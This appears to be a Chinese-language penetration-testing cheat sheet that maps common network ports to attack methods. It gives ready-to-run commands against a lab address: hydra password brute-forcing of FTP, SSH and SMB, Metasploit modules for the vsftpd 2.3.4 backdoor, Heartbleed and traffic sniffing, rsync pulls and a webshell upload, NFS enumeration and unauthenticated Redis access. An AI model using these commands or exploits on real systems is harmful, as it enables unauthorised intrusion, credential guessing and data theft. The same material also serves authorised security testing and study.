常见端口渗透

常见端口和服务

端口 说明 攻击方法
21 FTP-文件传输协议 弱口令、爆破、嗅探、后门
22 ssh-安全隧道远程登陆 弱口令、爆破
23 telnet-远程连接 弱口令、爆破、嗅探
25 smtp-简单邮件传输协议 邮件伪造
53 domain-DNS域名解析服务 DNS劫持、缓存投毒
80/443 http服务 常见Web漏洞、IIS写文件、OpenSSL
139 Samba服务 爆破、远程代码执行
445 局域网共享 ms-17010漏洞(Win7及之前版本)
873 Rsync 远程代码执行
1433 MSSQL数据库 爆破、SQL注入
2049 NFS 未授权访问
3306 MySQL数据库 爆破、SQL注入
3389 rdp-远程桌面连接 爆破、漏洞ms12-020
5432 postgresql 爆破、注入
5632 Pcanywhere 拒绝服务等漏洞、爆破
5900 VNC远程登陆 爆破、认证绕过
6379 Redis 未授权访问
7001/7002 weblogic Java反序列化漏洞
9990 jboss 远程代码执行、Java反序列化

攻击方向

21(FTP)

默认端口:20(数据端口);21(控制端口);69(tftp小型文件传输协议)

爆破:
1
2
3
#anonymous匿名登陆
#弱口令 用户名:FTP 密码:FTP或为空或爆破
hydra -l FTP -P top10000.txt ftp://192.168.115.136
嗅探:

Ettercap(内网神器)

或msf模块

1
use auxiliary/sniffer/psnuffle
后门:

在特定版本的vsftpd服务器中,被人恶意植入代码,当用户名以”:)”为结尾

服务器就会在6200端口监听,并且能够执行任意代码(root)

1
use exploit/unix/ftp/vsftpd_234_backdoor

22(SSH)

爆破:
1
2
#可以采用上边那种或以下这种写法
hydra -l root -P top10000.txt 192.168.115.136 ssh -v

53(DNS)

内网使用Ettercap进行DNS劫持,钓鱼攻击

公网的话要能控制运营商网关

139(Smb)

爆破:
1
hydra -l root -P top10000.txt 192.168.115.136 smb -v
远程代码执行:

CVE-2015-0240

CVE-2017-7494

443(https)

检测:

心脏滴血在线检测

1
nmap -sV -p 8443 --script ssl-heartbleed 192.168.115.136
利用:
1
use auxiliary/scanner/ssl/openssl_heartbleed

873(Rsync)

未授权访问:
1
2
rsync -avz ip::wwwroot/目录   /root/	#下载目标主机上的文件到本机root目录
rsync -avz shell.php 192.168.3.xxx::wwwroot #上传文件

2049(NFS)

未授权访问

列出导出文件夹:
1
use auxiliary/scanner/nfs/nfsmount

6379(Redis)

未授权访问:
1
2
3
4
#没有密码,直接连接
redis-cli -h 192.168.115.136
#Redis命令
>info #查看主机信息

Redis未授权访问总结(1)

Redis未授权访问总结(2)

7001/7002(weblogic)

反序列化:CVE-2017-3248